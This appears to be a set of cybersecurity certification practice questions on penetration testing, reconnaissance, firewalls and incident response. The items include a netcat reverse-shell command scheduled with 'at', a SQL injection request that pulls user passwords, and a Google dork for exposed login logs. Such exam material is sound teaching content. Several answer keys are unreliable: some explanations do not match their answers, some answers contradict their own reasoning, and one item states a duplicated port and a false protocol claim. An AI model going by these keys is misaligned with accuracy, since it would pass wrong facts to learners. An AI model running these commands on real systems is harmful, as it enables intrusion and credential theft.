Sybex Questions Section 1


Rhonda has identified a privilege escalation flaw on the system she targeted in the first phase of her penetration test and is now ready to take the next step. According to the NIST 800-115 standard, what is step C that Rhonda needs to take, as shown in this diagram? A. System browsing B. Scanning C. Rooting D. Consolidation

A. System browsing Explanation: Rhonda's next step is to prepare to pivot. To do so, she needs to browse for additional systems and to identify the methods she will use to access them. At times, this will move her back into the discovery phase.

Alex has been asked to implement network controls to ensure that users who authenticate to the network are physically in the building that the network they are authenticating to serves. What technology and tool should he use to do this? A. Geo-IP and port security B. GPS location and NAC C. GPS location and port security D. Geo-IP and NAC

B. GPS location and NAC Explanation: DNS poisoning uses modified DNS cache entries to redirect unsuspecting users to alternate IP addresses. This may be intentional if the DNS server owner wants to ensure that specific sites are blocked, but it can also be leveraged by attackers who manage to either take control of the DNS server or who manage to spoof or modify DNS updates.

Lauren has local access to a Windows workstation and wants to gather information about the organization that it belongs to. What type of information can she gain if she executes the command 'nbtstat -c'? A. MAC addresses and IP addresses of local systems B. NetBIOS name-to-IP address mappings C. A list of all NetBIOS systems that the host is connected to D. NetBIOS MAC-to-IP address mappings

B. NetBIOS name-to-IP address mappings Explanation: The command nbtstat -c shows the contents of the NetBIOS name cache, which is a list of name-to-IP address mappings.

What two pieces of information does nmap need to estimate network path distance? A. IP address and TTL B. TTL and operating system C. Operating system and BGP flags D. TCP flags and IP address

B. TTL and operating system Explanation: nmap can combine operating system identification and time to live to take a reasonable guess at the number of hops in the network path between the scanner and a remote system. The operating system guess provides the base time to live, and the TTL counter decrements at each hop. Given these two pieces of information, nmap takes an educated but often very accurate guess.

What is the default nmap scan type when nmap is not provided with a scan type flag? A. A TCP FIN scan B. A TCP connect scan C. A TCP SYN scan D. A UDP scan

C. A TCP SYN scan Explanation: By default, nmap uses a TCP SYN scan. If the user does not have proper socket privileges (such as root on a Linux system), it will use a TCP connect scan instead.

Geoff wants to perform passive reconnaissance as part of an evaluation of his organization's security controls. Which of the following techniques is a valid technique to perform as part of a passive DNS assessment? A. A DNS forward or reverse lookup B. A zone transfer C. A WHOIS query D. Using Maltego

C. A WHOIS query Explanation: Performing a WHOIS query is the only passive reconnaissance technique listed. Each of the other techniques performs an active reconnaissance task.

Lauren submits a suspected malware file to malwr.com and receives the following information about its behavior. What type of tool is malwr.com? A. A reverse-engineering tool B. A static analysis sandbox C. A dynamic analysis sandbox D. A decompiler sandbox

C. A dynamic analysis sandbox Explanation: Lauren's screenshot shows behavioral analysis of the executed code. From this, you can determine that malwr is a dynamic analysis sandbox that runs the malware sample to determine what it does while also analyzing the file.

While conducting a topology scan of a remote web server, Susan notes that the IP address returned for the same DNS entry changes over time. What has she likely encountered? A. A route change B. Fast flux DNS C. A load balancer D. An IP mismatch

C. A load balancer Explanation: Load balancers can alias multiple servers to the same hostname. This can be confusing when conducting scans, as it may appear that multiple IP addresses or hosts are responding for the same system.

Charles is investigating a process that he believes may be malicious. What Linux command can he use to determine what files that process has open? A. ps B. procmap C. lsof D. filemap

C. lsof Explanation: The lsof command, or "list open files", can report on open files and which process opened them. Charles can use lsof to find his answers quickly!

Chris wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use ssh? A. Add an iptables rule blocking root logins B. Add root to the sudoers group C. Change sshd_config to deny root login D. Add a network IPS rule to block root logins

C. Change sshd_config to deny root login Explanation: Fortunately, the sshd service has a configuration setting called PermitRootLogin. Setting it to no will accomplish Chris's goal.

Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on. A. 508 B. 617 C. 846 D. 714

D. 714 Explanation: The service running from the www directory as the user apache should be an immediate indication of something strange, and the use of webmin from that directory should also be a strong indicator of something wrong. Lucas should focus on the web server as the point of entry to the system and should review any files that the Apache user has created or modified. If local vulnerabilities existed when this compromise occurred, the attacker may have already escalated to another account.

Use the following scenario and image to answer the following three questions: While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the following information: What issue should Amanda report to the system administrator? A. High network utilization B. High memory utilization C. Insufficient swap space D. High CPU utilization

D. High CPU utilization Explanation: This view of htop shows that both CPU1 and CPU2 are maxed out at 100 percent. Memory is just over 60 percent used. Almost all swap space is available.

As part of her system hardening process for a Windows 10 workstation, Lauren runs the Microsoft Baseline System Analyzer. She sees the following result after MBSA runs. What can she determine from this scan? A. The system has been compromised, and shares allow all users to read and execute administrative files B. The system has default administrative shares enabled C. The system is part of a domain that uses administrative shares to manage systems D. The shares are properly secured and pose no threat to the system

B. The system has default administrative shares enabled Explanation: While administrative shares are useful for remote administration, they can pose a threat for systems that do not require them, and some security baselines suggest disabling them in the registry if they are not used.

While performing reconnaissance of an organization's network, Angela discovers that web.organization.com, www.organization.com, and documents.organization.com all point to the same host. What type of DNS record has she most likely found? A. A CNAME B. An MX record C. An SPF record D. An SOA record

A. A CNAME Explanation: A canonical name (CNAME) is used to alias one name to another. Incorrect answers: MX records are used for mail servers. SPF records indicate the mail exchanges (MXes) that are authorized to send mail for a domain. An SOA record is the Start of Authority record that notes where the domain is delegated from its parent domain.

Which of the following tools is not typically associated with the reconnaissance phase of a penetration test? A. Metasploit B. nmap C. Nessus D. Maltego

A. Metasploit Explanation: Metasploit is primarily an exploitation tool. While it has modules that can be used for reconnaissance, it is primarily used to target discovered vulnerabilities. nmap, Nessus, and Maltego are all commonly used to discover information.

Selah has been tasked with gathering information to increase her penetration testing team's understanding of their customer's Internet footprint. She wants to gather details of emails, subdomains, employee names, and other information in an automated way. Which of the following tools is best suited to her needs? A. nmap B. theHarvester C. Shodan D. osint-ng

B. theHarvester Explanation: The best option in this list for Selah's purposes is theHarvester. It combines search engine-based searches with Shodan and other data sources to gather email addresses, subdomain information, employee names, and a variety of other types of useful footprinting data. Incorrect answers: nmap is useful for port scanning but typically won't find email addresses and employee names. Shodan is a vulnerability search engine. osint-ng is a made-up tool name.

Charles wants to provide additional security for his web application that currently stores passwords in plain text in a database. Which of the following options is his best option to prevent theft of the database from resulting in exposed passwords? A. Encrypt the database of plain-text passwords B. Use MD5 and a salt C. Use SHA-1 and a salt D. Use bcrypt

D. Use bcrypt Explanation: bcrypt is a strong password hashing algorithm that includes salts for the stored values. If Charles uses bcrypt, he will have made the best choice from the list, as both MD5 and SHA-1 are not as strong, even with a salt. Encrypting the database may seem like a good idea, but storing plain-text passwords means that an exploit that can read the database while it is decrypted will get plain-text passwords.

While reviewing his Apache logs, Charles discovers the following entry. What occurred? 10.1.1.1 -- [27/Jun/2017:11:42:22 -0500] "GET /query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" A. A successful database query B. A PHP overflow attack C. A SQL injection attack D. An unsuccessful database query

C. A SQL injection attack Explanation: This shows an attempted SQL injection attack. The query reads 1 UNION SELECT 0 and then looks for the username, user ID, password, name, and email from the users table.

Rick's security research company wants to gather data about current attacks and sets up a number of intentionally vulnerable systems that allow his team to log and analyze exploits and attack tools. What type of environment has Rick set up? A. A tarpit B. A honeypot C. A honeynet D. A blackhole

C. A honeynet Explanation: Rick's team has set up a honeynet, which is a group of systems set up to attract attackers while capturing the traffic they send and the tools and techniques they use. A honeypot is a single system set up in a similar way. A tarpit is a system set up to slow down attackers. A blackhole is often used on a network as a destination for traffic that will be silently discarded.

As part of his reconnaissance effort, Charles uses the following Google search string: "authentication failure; logname=" ext:log;site:example.com What will he find if he receives results from his target's domain? A. A list of successful logins B. A list of log names C. A list of failed logins D. A list of log files

C. A list of failed logins Explanation: This Google dork relies on log files being inadvertently exposed for a site. If the authentication logs are exposed, this will show a list of failed logins, along with login paths, possibly providing Charles with a useful list of users. He can then leverage that list by attempting logins, by gathering further information on the users, or by using social engineering.

Rick is reviewing flows of a system on his network and discovers the following flow logs. What is the system doing? A. A port scan B. A failed three-way handshake C. A ping sweep D. A traceroute

C. A ping sweep Explanation: The increasing last octet of the target system's IP address (.6, .7, .8) and the ICMP protocol echo requests indicate that this is a ping sweep. This could be part of a port scan, but the only behavior shown here is the ping sweep. This is ICMP and cannot be a three-way handshake; a traceroute would follow a path rather than a series of IP addresses.

What occurs when Alex uses the following command to perform an nmap scan of a network? 'nmap -sP 192.168.2.0/24' A. A secure port scan of all hosts in the 192.168.0.0 to 192.168.2.255 network range B. A scan of all hosts that respond to ping in the 192.168.0.0 to 192.168.255.255 network range C. A scan of all hosts that respond to ping in the 192.168.2.0 to 192.168.2.255 network range D. A SYN-based port scan of all hosts in the 192.168.2.0 to 192.168.2.255 network range

C. A scan of all hosts that respond to ping in the 192.168.2.0 to 192.168.2.255 network range Explanation: The -sP flag for nmap indicates a ping scan, and /24 indicates a range of 255 addresses. In this case, that means that nmap will scan for hosts that respond to ping in the 192.168.2.0 to 192.168.2.255 IP address range.

After her discovery in the first part of this question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows: Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute. The average administrator at Lucy's organization is responsible for 140 to 300 machines. What danger does Lucy's alert create? A. A DDoS that causes administrators to not be able to access systems B. A network outage C. Administrators may ignore or filter the alerts D. A memory spike

C. Administrators may ignore or filter the alerts Explanation: When faced with massive numbers of notification messages that are sent too aggressively, administrators are likely to ignore the alerts. Once they do, they are unlikely to respond to actual issues, causing all of the advantages of monitoring to be lost. If she doesn't spend some time identifying reasonable notification thresholds and frequencies, Lucy's next conversation is likely to be with an angry system administrator or manager.

Susan wants to prevent attackers from running specific files and also wants to lock down other parts of the Windows operating system to limit the impact of attackers who have access to workstations she is responsible for. If she wants to do this on a Windows 10 workstation, what tool should she use? A. Secpol.msc B. FileVault C. AppLocker

C. AppLocker Explanation: AppLocker is a tool available for Windows 10 systems that allows rules based on file attributes to limit what applications and files users can run, including executable files, scripts, Windows Installer files, DLLs, packaged applications, and packaged application installers. Secpol.msc is the security policy snap-in and controls other parts of the Windows security configuration. FileVault is the macOS file encryption system. GPed is a made-up program.

Lauren's honeynet, shown here, is configured to use a segment of unused network space that has no legitimate servers in it. What type of threats is this design particularly useful for detecting? A. Zero-day attacks B. SQL injection C. Network scans D. DDoS attacks

C. Network scans Explanation: Detection systems placed in otherwise unused network space will detect scans that blindly traverse IP ranges. Since no public services are listed, attackers who scan this range can be presumed to be hostile and are often immediately blocked by security devices that protect production systems.

Rick's manager wants to present the most trustworthy certificate possible for a website. What type of certificate should Rick get? A. EV B. DV C. OV D. IV

A. EV Explanation: Extended Validation (EV) certificates require additional action to validate that the requester's legal identity is known, as well as the operational and physical presence of the website owner. In addition, the requesting organization has to prove that the domain owner has control over the domain name and that the person requesting the certificate has the authority to do so. Finally, they require a signature from an authorized officer of the company. Incorrect answers: DV certificates require domain ownership validation. OV certificates require proof of the right to manage the domain name. IV certificates are made up for this question.

Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where should she add a rule intended to block this type of traffic? A. The firewall B. The router C. The distribution switch D. The Windows 2012 Server

A. The firewall Explanation: Since Andrea is attempting to stop external scans from gathering information about her network topology, the firewall is the best place to stop them. A well-designed ruleset can stop, or at least limit, the amount of network topology information that attackers can collect.

Fred's reconnaissance of an organization includes a search of the Censys network search engine. There, he discovers multiple certificates with validity dates as shown here. What should Fred record in his reconnaissance notes? A. The certificates expired as expected, showing proper business practice B. The certificates were expired by the CA, possibly due to nonpayment C. The system that hosts the certificates may have been compromised D. The CA may have been compromised, leading to certificate expiration

A. The certificates expired as expected, showing proper business practice Explanation: When an organization expires multiple certificates, it often indicates a security problem that resulted in a need to invalidate the certificates. Fred should check for other information about a possible compromise near the dates of expiration.

Isaac has access to a Windows system that is a member of the local Active Directory domain as part of his white-box penetration test. Which of the following commands might provide information about other systems on the network? A. net use B. net user C. net group D. net config

A. net use Explanation: The net use command will list any network shares that the workstation is using, allowing Isaac to identify file servers or other systems with file sharing that the workstation is configured to use. Incorrect answers: net user will show user accounts for the local PC, net group is only usable on domain controllers, and net config allows the server and workstation services to be controlled.

While conducting a penetration test, Ben executes the following command: 'ifconfig eth0 hw ether 08:00:27:06:d4' What network protection is Ben most likely attempting to avoid? A. Port security B. NAC C. A firewall D. An IPS

A. Port security Explanation: Port security filters on MAC address, and the command Ben executed changed the MAC address of his PC. In most cases, simply changing a MAC address will not help him bypass NAC, and both firewalls and IPSs won't care about the MAC address.

Charleen works for a US government contractor that uses NIST's definition to describe threat categories. How should she categorize the threat posed by competitors that might seek to compromise her organization's website? A. Adversarial B. Accidental C. Structural D. Environmental

A. Adversarial Explanation: Adversarial threats are individuals, groups, and organizations that are attempting to deliberately undermine the security of an organization. Adversaries may include trusted insiders, competitors, suppliers, customers, business partners, or even nation states.

The national insurance company that Luke works for has experienced a breach, and Luke is attempting to categorize the impact. As he reviews the incident report, he notes that customer data that includes Social Security numbers was exfiltrated from the organization. How should he categorize the impact? A. As a regulated information breach B. As an intellectual property breach C. As a confidential information breach D. As an integrity loss

A. As a regulated information breach Explanation: Luke knows that Social Security number breaches are regulated in most states in the United States and that this means his organization has experienced a regulated information breach. He will now most likely have to take actions as required by law in the states in which they have nexus.

During a white-box penetration test, Luke finds that he is suddenly unable to connect to the target network. What has likely happened? A. Automated shunning B. Network link failure C. Back-off algorithms D. A BGP route change

A. Automated shunning Explanation: Automated shunning, whether via IPS or other technology, can block attackers but can also prevent penetration testers from being able to conduct scans or attacks. When planning a white-box penetration test, it is typical to discuss the presence of technologies that may block or limit the test and to either work around them or to disable them for the tester's IP addresses if they are not directly in scope.

Lucca wants to validate DNS responses to ensure that they are from authoritative DNS servers. What technology can he use to do this? A. DNSSEC B. DNSCrypt C. DNShield D. DNS is an open protocol and does not support secure validation

A. DNSSEC Explanation: DNSSEC allows authoritative DNS servers to use digital signatures to validate their responses.

As part of her malware analysis process, Kara builds a diagram of the components of the suspected malware package. At each stage, she unpacks, de-obfuscates, and identifies each subcomponent, adding to her diagram. What is this process known as? A. Decomposition B. Disassembly C. Reverse archiving D. Fingerprinting

A. Decomposition Explanation: Kara is performing a decomposition process on the malware she is investigating. Decomposition helps to understand a software package or program and can sometimes provide information more quickly than a static or dynamic analysis, because it does not have to run a program to analyze how it behaves and does not require intensive manual review of the underlying code or disassembly of compiled code.

During a port scan of her network, Cynthia discovers a workstation that shows the following ports open. What should her next action be? 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 7680/tcp open unknown 49677/tcp open unknown A. Determine the reason for the ports being open B. Investigate the potentially compromised workstation C. Run a vulnerability scan to identify vulnerable services D. Reenable the workstation's local host firewall

A. Determine the reason for the ports being open Explanation: Cynthia's first action should be to determine whether there is a legitimate reason for the workstation to have the listed ports open.

WPA2 Enterprise protected wireless networks of her target organization. What major differences exist between reconnaissance of a wired network versus a wireless network? A. Encryption and physical accessibility B. Network access control and encryption C. Port security and physical accessibility D. Authentication and encryption

A. Encryption and physical accessibility Explanation: Tracy knows that most wired networks do not use end-to-end encryption by default and that wireless networks are typically more easily accessible than a wired network that requires physical access to a network jack or a VPN connection from an authorized account. Without more detail, she cannot determine whether authentication is required for both networks, but NAC is a common security feature of wired networks, and WPA2 Enterprise requires authentication as well. Port security is used only for wired network connections.

When Scott performs an nmap scan with the -T flag set to 5, what variable is he changing? A. How fast the scan runs B. The TCP timeout flag it will set C. How many retries it will perform D. How long the scan will take to start up

A. How fast the scan runs Explanation: The nmap -T flag accepts a setting between 0 ("paranoid") and 5 ("insane"). When Scott sets his scan to use the insane setting, it will perform the fastest scanning it can, which will likely set off any IDS or IPS that is watching for scans.

Lauren's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command: 'at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe' What does this command do? A. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30 B. It uses the AT command to dial a remote host via NetBIOS C. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30 D. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST

A. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30 Explanation: The at command can be used to schedule Windows tasks. This task starts netcat as a reverse shell using cmd.exe via port 443 every Friday at 8:30 PM local time. Lauren should be concerned, as this allows traffic in that otherwise might be blocked.

Jennifer analyzes a Wireshark packet capture from a network that she is unfamiliar with. She discovers that a host with IP address 10.11.140.13 is running services on TCP ports 636 and 443. What services is that system most likely running? A. LDAPS and HTTPS B. FTPS and HTTPS C. RDP and HTTPS D. HTTP and Secure DNS

A. LDAPS and HTTPS Explanation: TCP port 636 is often used for secure LDAP, and secure HTTP typically uses TCP 443. While other services could use these ports, Jennifer's best bet is to presume that they will be providing the services they are typically associated with.

Charles wants to limit what potential attackers can gather during passive or semipassive reconnaissance activities. Which of the following actions will typically reduce his organization's footprint the most? A. Limit information available via the organizational website without authentication B. Use a secure domain registration C. Limit the technology references in job postings D. Purge all document metadata before posting

A. Limit information available via the organizational website without authentication Explanation: Limiting the information available about an organization by requiring authentication will strongly limit the ability of potential attackers to gather information. Secure domain registration may conceal the registration contact's information but does not provide any real additional protection. Limiting technologies listed in a job posting can help limit what attackers may find out, but most organizations would prefer to better match candidates. Finally, purging all metadata can help protect information about internal systems and devices, but it is difficult to enforce, and document metadata is not a primary source of information about most organizations.

Which sources are most commonly used to gather information about technologies a target organization uses during intelligence gathering? A. OSINT searches of support forums and social engineering B. Port scanning and social engineering C. Social media review and document metadata D. Social engineering and document metadata

A. OSINT searches of support forums and social engineering Explanation: Since organizations often protect information about the technologies they use, searches of support forums and social engineering are often combined to gather information about technologies they have in place. Port scanning will typically not provide detailed information about services and technologies. Social media review may provide some hints, but document metadata does not provide much information about specific technologies relevant to a penetration test or attack.

What type of control review will focus on change management as a major element in its assessment scope? A. Operation control review B. Technical control review C. Detective control review D. Responsive control review

A. Operation control review Explanation: A review of operational controls will often look at change management, separation of duties and other personnel controls, and process-based controls. Many administrative controls are part of an operational control review. These are sometimes conducted as Service Organization Control (SOC) audits, with SOC 1, 2, and 3 reports generated depending on the level and depth of the assessment.

During the reconnaissance stage of a penetration test, Cynthia needs to gather information about the target organization's network infrastructure without causing an IPS to alert the target to her information gathering. Which of the following is her best option? A. Perform a DNS brute-force attack B. Use an nmap ping sweep C. Perform a DNS zone transfer D. Use an nmap stealth scan

A. Perform a DNS brute-force attack Explanation: While it may seem strange, a DNS brute-force attack that queries a list of IPs, common subdomains, or other lists of targets will often bypass intrusion detection and prevention systems that do not pay particular attention to DNS queries. Cynthia may even be able to find a DNS server that is not protected by the organization's IPS.

During the reconnaissance stage of a penetration test, Fred calls a number of staff at the target organization. Using a script he prepared, Fred introduces himself as part of the support team for their recently installed software and asks for information about the software and its configuration. What is this technique called? A. Pretexting B. OSINT C. A tag out D. Profiling

A. Pretexting Explanation: Pretexting is a form of social engineering that uses an invented story to justify the social engineer's motives. In this case, Fred is giving his targets reason to believe he is legitimately a member of the organization's support team. Incorrect answers: OSINT refers to open source intelligence, which is data gathered from public sources. A tag-out sometimes refers to handing off to another member of a penetration test team. Profiling is conducted while gathering information about an individual, team, or organization before conducting a social engineering attack.

While scanning a network, Frank discovers a host running a service on TCP ports 1812 and 1813. What type of server has Frank most likely discovered? A. RADIUS B. VNC C. Kerberos D. Postgres

A. RADIUS Explanation: RADIUS typically uses TCP ports 1812 and 1812. Incorrect answers: Kerberos is primarily a RDP service, although it also uses TCP 544 and 2105. Postgres uses 5432. VNC uses 5500.

Michelle has been experiencing SYN floods and deploys a mitigation technique that allows the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. If the client then responds with a SYN-ACK, the server reconstructs the SYN entry and continues the connection. What technique is Michelle using? A. SYN cookies B. ACK-ACK C. TCP frogging D. SYN replay

A. SYN cookies Explanation: Using SYN cookies allows a server to act as though its SYN queue is larger than it is, reducing or completely preventing the issues encountered during a SYN flood. Discarding SYNs from the queue and waiting for a SYN-ACK allows the server to prevent resource exhaustion while still responding to legitimate connection requests. Of course, SYN cookies do nothing against DoS attacks that go further than a SYN flood!

Susan is reviewing files on a Windows workstation and believes that cmd.exe has been replaced with a malware package. Which of the following is the best way to validate her theory? A. Submit cmd.exe to VirusTotal B. Compare the hash of cmd.exe to a known good version C. Check the file using the National Software Reference Library D. Run cmd.exe to make sure its behavior is normal

A. Submit cmd.exe to VirusTotal Explanation: Susan's best option is to submit the file to a tool like VirusTotal, which will scan it for virus-like behaviors and known malware tools. Checking the hash, either manually or by using the National Software Reference Library, can tell her if the file matches a known good version but won't tell her if it includes malware. Running a suspect file is the worst option on the list.

Charles uses Network Miner to review packet captures from his reconnaissance of a target organization. One system displayed the information shown here. What information has Network Miner used to determine that the PC is a Hewlett-Packard device? A. The MAC address B. The OS flags C. The system's banner D. The IP address

A. The MAC address Explanation: Device manufacturer identification relies on the MAC address, which includes a vendor prefix. Since MAC addresses can be changed in software, this is not guaranteed to be accurate, but in most cases you can reasonably expect it to match the manufacturer of the NIC. This list of prefixes can be found at http://standard.oui.ieee.org/oui/oui.txt.

Charles uses the following command while investigating a Windows workstation used by his organization's vice president of finance, who only works during normal business hours. Charles believes that the workstation has been used without permission by members of his organization's cleaning staff after hours. What does he know if the user ID shown is the only user ID able to log into the system and he is investigating on August 12, 2017? C:\Users\bigfish>wmic netlogin get name, lastlogon, badpasswordcount BadPasswordCount LastLogon Name NT AUTHORITY\SYSTEM 0 20170811203748.00000-240 Finance\bigfish A. The account has been compromised. B. No logins have occurred C. The last login was during business hours D. Charles cannot make any determinations from this information

A. The account has been compromised Explanation: Charles can see that no invalid logins occurred and that someone logged in as the user after business hours. This means that the account has likely been compromised and that he should investigate how the password was lost. (In many cases, Charles needs to ask the VP of finance about bad password habits like writing it down or using a simple password.)

What US government program seeks to provide trusted sources that meet the following requirements? - Provide a chain of custody for classified and unclassified integrated circuits - Ensure that there will not be any reasonable threats related to supply disruption - Prevent intentional or unintentional modification or tampering of integrated circuits - Protect integrated circuits from reverse engineering and vulnerability testing A. Trusted Foundry B. Chain of Custody C. Trusted Suppliers D. Trusted Access Program

A. Trusted Foundry Explanation: The US Department of Defense's Trusted Foundry program is intended to ensure the integrity and confidentiality of integrated circuits throughout the design and manufacturing life cycle while retaining access to leading-edge technology for trusted and untrusted uses.

Chris wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Chris accomplish this for Windows 10 Pro workstations? A. Using application whitelisting to prevent all unallowed programs from running B. Using Windows Defender and adding the game to the blacklist file C. By listing it in the Blocked Programs list via secpol.msc D. You cannot blacklist applications in Windows 10 without a third-party application

A. Using application whitelisting to prevent all unallowed programs from running Explanation: Windows 10 Pro and Enterprise support application whitelisting. Chris can whitelist his allowed programs and then set the default mode to "disallowed", preventing all other applications from running and thus blacklisting the application. This can be a bit of a maintenance hassle but can be useful for high-security environments or those in which limiting what programs can run is critical.

Mike's penetration test requires him to use passive mapping techniques to discover network topology. Which of the following tools is best suited to that task? A. Wireshark B. nmap C. netcat D. Angry IP Scanner

A. Wireshark Explanation: Passive network mapping can be done by capturing network traffic using a sniffing tool like Wireshark. Active scanners including nmap, the Angry IP Scanner, and netcat (with the -z flag for port scanning) could all set off alarms as they scan systems on the network.

Which of the following tools can be used to passively gather the information required to generate a network topology map? A. Wireshark B. nmap C. SolarWinds Network Mapper D. Nessus

A. Wireshark Explanation: Wireshark can be used to capture network traffic, allowing you to review traffic information to build a network topology based on time to live, IP addresses, and other information. Incorrect answers: nmap and SolarWinds Network Mapper both rely on active scans to generate topologies, and Nessus does not provide a network topology generation capability.

Which of the following commands will provide Ben with the most information about a host? A. dig -x [ip address] B. host [ip address] C. nslookup [ip address] D. zonet [ip address]

A. dig -x [ip address] Explanation: The dig command provides information including the time the query was done, details of the query that was sent, and the flags sent. In most cases, however, host, dig -x, and nslookup will provide roughly the same information. Zonet is not an actual Linux command.

Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11? A. iptables -A OUTPUT -d 10.24.31.11 -j DROP B. iptables -A INPUT -d 10.24.31.11 -j ADD C. iptables -block -host 10.24.31.11 -j DROP D. iptables -block -ip 10.24.31.11 -j ADD

A. iptables -A OUTPUT -d 10.24.31.11 -j DROP Explanation: Adding an iptables entry uses the -A flag to append to a chain. Here, you can safely assume that OUTPUT is the outbound ruleset. The -d flag is used to designate the destination IP address or subnet range, and -j specifies the action, DROP.

Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C. Which set of the following commands will accomplish this? Destination host IP address: 192.168.2.11; Host A IP address: 10.1.1.170; Host B: 10.2.0.132; Host C: 10.2.0.130 A. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP # iptables -I INPUT 2 -s 10.2.0.0/24 --dport 25 -j DROP # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW B. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP # iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW C. # iptables -I INPUT 2 -s 10.1.1.170 -j ALLOW # iptables -I INPUT 2 -s 10.2.0.0.134 -j ALLOW # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j DROP D. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP # iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP # iptables -I INPUT 2 -s 10.2.0.130 -j ALLOW

B. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP # iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW Explanation: These commands will add filters to the INPUT ruleset that block traffic specifically from hosts A and B, while allowing only port 25 from host C. Option D might appear attractive, but it allows all traffic from host C instead of only SMTP. Option A only drops SMTP traffic from host B (and all of the other hosts in its /24 segment), while option C allows traffic in from the hosts you want to block.

Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action? A. #iptables-policy INPUT DROP B. #iptables-policy SERVICE DROP C. #iptables-policy OUTPUT DROP D. #iptables-policy FORWARD DROP

B. #iptables-policy SERVICE DROP Explanation: By default, an iptables firewall will have INPUT, OUTPUT

While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person? A. An encrypted RAT B. A VPN application C. A secure web browser D. A base64-encoded packet transfer utility

B. A VPN application Explanation: ESP packets are part of the IPsec protocol suite and are typically associated with a tunnel or VPN. Ryan should check for a VPN application and determine what service or system that user may have connected to.

Andrea wants to conduct a passive footprinting exercise against a target company. Which of the following techniques is not suited to a passive footprinting process? A. WHOIS lookups B. Banner grabbing C. BGP looking glass usage D. Registrar checks

B. Banner grabbing Explanation: Banner grabbing is an active process and requires a connection to a remote host to grab the banner. The other methods are all passive and use third-party information that does not require a direct lookup against a remote host.

While reviewing output from netstat, John sees the following output. What should his next action be? [minesweeper.exe] TCP 127.0.0.1:62522 dynamo:0 LISTENING [minesweeper.exe] TCP 192.168.1.100 151.101.2.69:https ESTABLISHED A. Capture traffic to 151.101.2.69:https using Wireshark B. Initiate the organization's incident response plan C. Check to see whether 151.101.2.69 is a valid Microsoft address D. Ignore it, because this is a false positive

B. Initiate the organization's incident response plan Explanation: John has discovered a program that is accepting connections and has an open connection, neither of which is typical for the Minesweeper game. Attackers often disguise Trojans as innocent applications, so John should follow his organization's incident response plan.

Lauren wants to perform regular scans of the entire organizational network but only has a budget that supports buying hardware for a single scanner. Where should she place her scanner to have the most visibility and impact? A. Location A B. Location B C. Location C D. Location D

B. Location B Explanation: Lauren will see the most important information about her organization at location B, which provides a view of data center servers behind the data center firewall. To get more information, she should request that the client network firewall ruleset include a rule allowing her scanner to scan through the firewall to all ports for all systems on all protocols.

As part of an externally accessible information review by their security team, Bob and Lisa receive information that the security team gathered, including the following entry: What type of tool could they use to gather this publicly available information about their systems in the future? A. nmap B. A BGP looking glass C. A BGP reflector D. A route/path assimilator

B. A BGP looking glass Explanation: BGP looking glasses provide a public view of route information to hosts and networks. This can provide information to penetration testers about network connectivity. While nmap has many capabilities, it doesn't provide route lookups. BGP route reflectors (also known as BGP speakers, which advertise routes to peers) and route/path assimilators were made up for this question.

Chris knows that systems have connected to a remote host on TCP ports 1433 and 1434. If he has no other data, what should his guess be about what the host is? A. A print server B. A Microsoft SQL server C. A MySQL server D. A secure web server running on an alternate port

B. A Microsoft SQL server Explanation: TCP ports 1433 and 1434 are commonly associated with Microsoft SQL servers. A print server will likely use ports 515, 631, and 9100; a MySQL server will typically use 3306; and alternate ports for web servers vary, but 8443 is a common alternative port.

Aubrey is reviewing her firewall logs for signs of attacks in her role as a blue team member during a penetration test. Which of the following types of attack is she least likely to be able to identify using a stateful packet inspection firewall? A. A SYN flood B. A SQL injection attack C. A port scan D. A DDoS attack

B. A SQL injection attack Explanation: Identifying a SQL injection attack requires the ability to see the content of the query. Most stateful packet inspection firewalls do not show full packet content and instead log a success or fail based on port, IP address, and protocol according to a rule. A DDoS attack may also be difficult to identify, but the massive amount of traffic from multiple sources to a single service can help point out the issue.

Rick is auditing a Cisco router configuration and notes the following line: 'login block-for 120 attempt 5 with 60' What type of setting has been enabled? A. A DDoS prevention setting B. A back-off setting C. A telnet security setting D. An auto login prevention setting

